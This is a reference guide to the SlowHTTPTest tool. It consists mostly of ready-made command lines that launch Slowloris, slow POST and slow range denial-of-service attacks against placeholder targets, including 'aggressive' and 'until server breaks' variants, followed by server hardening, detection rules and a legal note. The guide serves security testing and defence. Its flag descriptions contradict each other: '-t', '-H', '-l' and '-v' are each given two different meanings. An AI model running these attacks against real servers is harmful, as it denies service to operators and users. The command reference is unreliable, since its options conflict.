SlowHTTPTest

Overview

SlowHTTPTest is a benchmarking and DoS testing tool designed to expose application-layer vulnerabilities in web servers. It simulates slow HTTP attacks including Slowloris (slow headers), slow POST (R.U.D.Y.), and slow range attacks that exploit the way servers allocate resources to long-lived connections. Unlike volumetric attacks, slow HTTP attacks use minimal bandwidth and low connection counts to exhaust server resources, making them difficult to detect with traditional rate-limiting defenses. SlowHTTPTest is essential for web application security assessments and server hardening validation.

Installation

Linux (Debian/Ubuntu)

sudo apt-get update
sudo apt-get install slowhttptest

Linux (Fedora/RHEL)

sudo dnf install slowhttptest

macOS

brew install slowhttptest

From Source

git clone https://github.com/shekyan/slowhttptest.git
cd slowhttptest
./configure
make
sudo make install

Verify Installation

slowhttptest -h
slowhttptest -v

Basic Usage

Command Structure

slowhttptest -u <URL> -c <connections> -H -g -o <output-file>

Help and Version

slowhttptest -h        # Display help message
slowhttptest -v        # Show version information
slowhttptest -help     # Extended help

Slowloris Attack (-H flag)

Overview

Slowloris attacks hold HTTP connections open by sending headers very slowly, preventing the server from processing new requests. The server allocates a thread/worker to each connection, eventually exhausting all available resources.

Basic Slowloris Test

slowhttptest -u http://target.com -H -c 100 -g

Send 100 slow header attacks against target.com and generate statistics.

Option	Description
-u	Target URL (http://host:port/path)
-H	Slowloris (slow headers) attack mode
-c 100	Number of simultaneous connections
-g	Generate statistics output (CSV)

Slowloris with Extended Duration

slowhttptest -u http://target.com:8080 -H -c 50 -N -g -o slowloris_test

Run 50 slow header connections until timeout (-N = no timeout), save stats to slowloris_test.csv.

Option	Description
-N	No timeout (run until server breaks)
-o	Output file for statistics
-r 500	Send request every 500ms

Slowloris with Rate Control

slowhttptest -u http://target.com -H -c 200 -r 1000 -w 10 -x 4096

200 connections, send data every 1000ms, 10-byte window, max 4KB header before sending.

Option	Description
-r 1000	Milliseconds between requests sent
-w 10	Bytes sent per window
-x 4096	Max header size before full request

Slowloris Advanced Tuning

slowhttptest -u http://192.168.1.100 -H -c 300 -i 10 \
  -r 200 -w 5 -t GET -m 16 -g -o results

Option	Description
-i 10	Seconds between status updates
-r 200	Interval between data sends (ms)
-w 5	Window size (bytes)
-t GET	HTTP method (GET, POST, etc.)
-m 16	Request multiplier

Slow POST Attack (-B flag)

Overview

Slow POST attacks (R.U.D.Y. - Are You Dead Yet?) exploit the Content-Length header by sending POST data extremely slowly. The server keeps the connection alive waiting for the body, exhausting resources.

Basic Slow POST Test

slowhttptest -u http://target.com/form.php -B -c 100 -g

Send 100 slow POST bodies to target endpoint.

Option	Description
-u	Target URL (must accept POST)
-B	Slow POST (R.U.D.Y.) attack mode
-c 100	Concurrent POST bodies
-g	Generate statistics

Slow POST with Custom Body Size

slowhttptest -u http://target.com -B -c 50 -l 10000 -r 500 -g

Send 50 POST requests with 10KB body, one byte every 500ms.

Option	Description
-l 10000	Content length in bytes
-r 500	Milliseconds between body chunks
-w 1	Single byte per window

Slow POST Aggressive Mode

slowhttptest -u http://target.com -B -c 200 -l 50000 -r 100 \
  -w 1 -t POST -g -o post_attack

Large payload (50KB), 200 connections, very slow transmission (1 byte/100ms).

Option	Description
-l 50000	50KB POST body
-r 100	Send every 100ms
-w 1	Minimum window

Slow POST to Specific Endpoints

slowhttptest -u http://target.com/api/upload -B -c 100 \
  -l 100000 -r 1000 -g

Target upload endpoint with very large, very slow POST body.

Slow Range Attack (-R flag)

Overview

Slow Range attacks exploit HTTP Range request headers. Servers processing range requests allocate resources for each range specification. Sending many overlapping or sequential ranges slowly exhausts memory and CPU.

Basic Slow Range Test

slowhttptest -u http://target.com/large_file.bin -R -c 100 -g

Send 100 slow range requests against target file.

Option	Description
-u	Target URL (static file)
-R	Slow range attack mode
-c 100	Concurrent range requests
-g	Generate statistics

Slow Range with Overlapping Ranges

slowhttptest -u http://target.com/download.iso -R -c 150 \
  -r 500 -w 100 -g -o range_test

150 connections requesting overlapping file ranges every 500ms.

Option	Description
-r 500	Interval between ranges
-w 100	Bytes per range segment
-o range_test	Output statistics file

Slow Range Large File Attack

slowhttptest -u http://target.com/large.zip -R -c 200 \
  -l 1000000 -r 100 -w 1 -g

Target 1MB file with 200 slow range requests.

Option	Description
-l 1000000	Target file size
-r 100	Range request interval
-w 1	Minimal window

Connection Parameters

Control Concurrent Connections

slowhttptest -u http://target.com -H -c 50
slowhttptest -u http://target.com -H -c 100
slowhttptest -u http://target.com -H -c 500

Start with low connection counts and increase to identify server threshold.

Adjust Transmission Rate

slowhttptest -u http://target.com -H -c 100 -r 100    # Fast (100ms)
slowhttptest -u http://target.com -H -c 100 -r 1000   # Slow (1s)
slowhttptest -u http://target.com -H -c 100 -r 5000   # Very slow (5s)

Control Data Window Size

slowhttptest -u http://target.com -H -c 100 -w 1      # 1 byte chunks
slowhttptest -u http://target.com -H -c 100 -w 10     # 10 byte chunks
slowhttptest -u http://target.com -H -c 100 -w 1024   # 1KB chunks

Set Maximum Content-Length

slowhttptest -u http://target.com -B -c 50 -x 8192

Limit header size to 8KB before completing request transmission.

Option	Description
-x 8192	Max header bytes

HTTP Method and Headers

Specify HTTP Method

slowhttptest -u http://target.com -H -t GET          # GET request
slowhttptest -u http://target.com -H -t HEAD         # HEAD request
slowhttptest -u http://target.com -H -t POST         # POST request
slowhttptest -u http://target.com -H -t PUT          # PUT request
slowhttptest -u http://target.com -H -t OPTIONS      # OPTIONS request

Custom User-Agent

slowhttptest -u http://target.com -H -c 100 \
  -A "Mozilla/5.0 (Custom User Agent)"

Add HTTP Headers

slowhttptest -u http://target.com -H -c 100 \
  -H "X-Custom-Header: value"

Timeout and Duration Control

Set Connection Timeout

slowhttptest -u http://target.com -H -c 100 -t 300

Timeout connections after 300 seconds (5 minutes).

Option	Description
-t 300	Timeout in seconds

Run Until Server Response

slowhttptest -u http://target.com -H -c 100 -N

Continue sending slow data (-N flag) until server closes connection or timeout reached.

Option	Description
-N	No fixed timeout, continuous

Set Update Interval

slowhttptest -u http://target.com -H -c 100 -i 5

Display status updates every 5 seconds.

Option	Description
-i 5	Interval between updates (seconds)

Output and Statistics

Generate CSV Statistics

slowhttptest -u http://target.com -H -c 100 -g -o results.csv

Run test and save connection statistics to CSV file.

Option	Description
-g	Enable statistics generation
-o	Output file name

CSV Output Format

Window size: 10 bytes
Bytes sent: 1024000
Test duration: 312 seconds
Connections created: 100
Connections completed: 85
Connections timed out: 15
Bytes received: 51200

Interpret Statistics Output

• Total requests sent: Number of slow requests initiated
• Completed connections: Server accepted and closed normally
• Timed out connections: Server killed slow connections
• Bytes received: Server responses (responses = resilience)
• Test duration: Time until all connections resolved

Verbose Output

slowhttptest -u http://target.com -H -c 50 -v

Display verbose connection and transmission details.

Probing and Discovery

Basic Server Response Test

slowhttptest -u http://target.com -H -c 1 -t 30 -i 2

Single connection test to probe server timeout and response behavior.

Test Multiple Attack Types

# Test Slowloris
slowhttptest -u http://target.com -H -c 100 -g -o slowloris.csv

# Test Slow POST
slowhttptest -u http://target.com -B -c 100 -g -o slowpost.csv

# Test Slow Range
slowhttptest -u http://target.com/file.bin -R -c 100 -g -o range.csv

Identify Server Type and Timeout

slowhttptest -u http://target.com -H -c 5 -v -t 600

Run small test with verbose output to identify web server type and resource limits.

Testing Methodology

Phase 1: Reconnaissance

# Test basic connectivity
curl -I http://target.com

# Check for custom headers (may indicate WAF/IDS)
curl -v http://target.com

# Identify HTTP version support
curl --http1.1 http://target.com
curl --http2 http://target.com

Phase 2: Baseline Testing

# Single connection baseline
slowhttptest -u http://target.com -H -c 1 -t 300 \
  -r 1000 -w 10 -i 30 -g -o baseline.csv

Establish server response time and stability with minimal load.

Phase 3: Incremental Load Testing

# Start with low connection count
slowhttptest -u http://target.com -H -c 10 -t 600 -g -o test_10.csv

# Double connections
slowhttptest -u http://target.com -H -c 20 -t 600 -g -o test_20.csv

# Continue increasing
slowhttptest -u http://target.com -H -c 50 -t 600 -g -o test_50.csv
slowhttptest -u http://target.com -H -c 100 -t 600 -g -o test_100.csv

Phase 4: Attack Vector Selection

# Test most effective vector based on Phase 3 results
slowhttptest -u http://target.com -H -c 100 -N -g -o final_test.csv

Phase 5: Impact Validation

# Monitor server during test
watch -n 1 'netstat -an | grep ESTABLISHED | wc -l'

# Check CPU and memory
top
vmstat 1

# Monitor application logs
tail -f /var/log/apache2/access.log
tail -f /var/log/nginx/access.log

Interpreting Results

Server Vulnerability Indicators

• Completed connections >> Timed out: Server has high timeout; slow attacks effective
• Timed out >> Completed: Server has aggressive timeout; requires slower transmission
• Rapid error responses: Server rate-limiting enabled
• No responses: Server may be processing connections synchronously (vulnerable)

Resource Exhaustion Signs

• Rapid increase in incomplete connections: Threshold identified
• Connection reset messages: Server hitting resource limits
• Application errors: Database connection pool exhausted
• System resource warnings: CPU/memory saturation detected

Successful Attack Conditions

Connections created: 150
Connections completed: 12
Connections timed out: 138
Avg response time: 0ms (most got no response)
Legitimate traffic: Unable to connect

Server Hardening and Mitigation

Apache Hardening

# Install mod_ratelimit for connection limiting
sudo a2enmod ratelimit
sudo a2enmod reqtimeout

# Configure request timeout
sudo nano /etc/apache2/mods-available/reqtimeout.conf

Apache Configuration:

<IfModule mod_reqtimeout.c>
  RequestReadTimeout header=20,minrate=500 body=20,minrate=500
</IfModule>

Force minimum 500 bytes/second header transmission rate.

Nginx Hardening

sudo nano /etc/nginx/nginx.conf

Nginx Configuration:

client_body_timeout 10s;
client_header_timeout 10s;
client_body_buffer_size 1K;
client_header_buffer_size 1K;
client_max_body_size 2m;
keepalive_timeout 5s 5s;
send_timeout 10s;

HAProxy Configuration

sudo nano /etc/haproxy/haproxy.cfg

HAProxy Settings:

timeout client 10s
timeout server 10s
timeout connect 5s
timeout http-keep-alive 3s
timeout http-request 10s
option http-server-close
option forwardfor
maxconn 256

Connection Limits

# Linux limit open files
ulimit -n 65536

# Configure in /etc/security/limits.conf
* soft nofile 65536
* hard nofile 65536

Rate Limiting (iptables)

# Limit new connections per IP
sudo iptables -A INPUT -p tcp --dport 80 -m limit \
  --limit 25/minute --limit-burst 100 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 80 -j DROP

Web Application Firewall (ModSecurity)

sudo apt-get install libapache2-mod-security2

# Enable and configure
sudo a2enmod security2
sudo cp /etc/modsecurity/modsecurity.conf-recommended \
  /etc/modsecurity/modsecurity.conf

# Configure rules
sudo cp /usr/share/modsecurity-core-rules/*.conf \
  /etc/modsecurity/rules/

Reverse Proxy/Load Balancer

Deploy reverse proxy (Nginx, HAProxy) to:

• Enforce connection timeouts
• Implement per-IP rate limiting
• Buffer incomplete requests
• Offload slow client handling

Application-Level Hardening

# Python Flask example
from flask import Flask
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address

app = Flask(__name__)
limiter = Limiter(
    app=app,
    key_func=get_remote_address,
    default_limits=["200 per day", "50 per hour"]
)

@app.route('/')
@limiter.limit("10 per minute")
def index():
    return "Hello, World!"

Monitoring and Detection

Monitor Active Connections

# Watch connection count in real-time
watch -n 1 'ss -tan | grep ESTABLISHED | wc -l'

# Per-IP connection count
ss -tan | awk '{print $5}' | cut -d: -f1 | sort | uniq -c

Log Analysis for Slow HTTP Attacks

# Find incomplete requests (no final CRLF)
grep -E 'incomplete|timeout' /var/log/apache2/access.log

# Identify slow clients
tail -f /var/log/apache2/access.log | \
  awk '$NF > 30 {print "Slow: " $0}'

IDS Rules (Snort/Suricata)

alert http any any -> any any \
  (msg:"Possible Slowloris Attack"; \
  content:"GET "; http_method; \
  byte_test:1,>,0,0,relative; \
  timeout:60; sid:1000001;)

alert http any any -> any any \
  (msg:"Slow POST Detected"; \
  content:"Content-Length|3a|"; \
  byte_test:4,>,10000,0,relative; \
  timeout:600; sid:1000002;)

Legal and Ethical Considerations

• Only test against systems you own or have explicit written permission to test
• Obtain management approval before conducting DoS testing in production
• Notify operations and security teams before testing begins
• Establish rollback procedures in case of legitimate user impact
• Document all test parameters and results
• Use isolated lab or development environments for initial testing
• Comply with all applicable laws regarding unauthorized access and denial of service
• Ensure adequate monitoring and incident response procedures are in place
• Train development teams on secure connection handling practices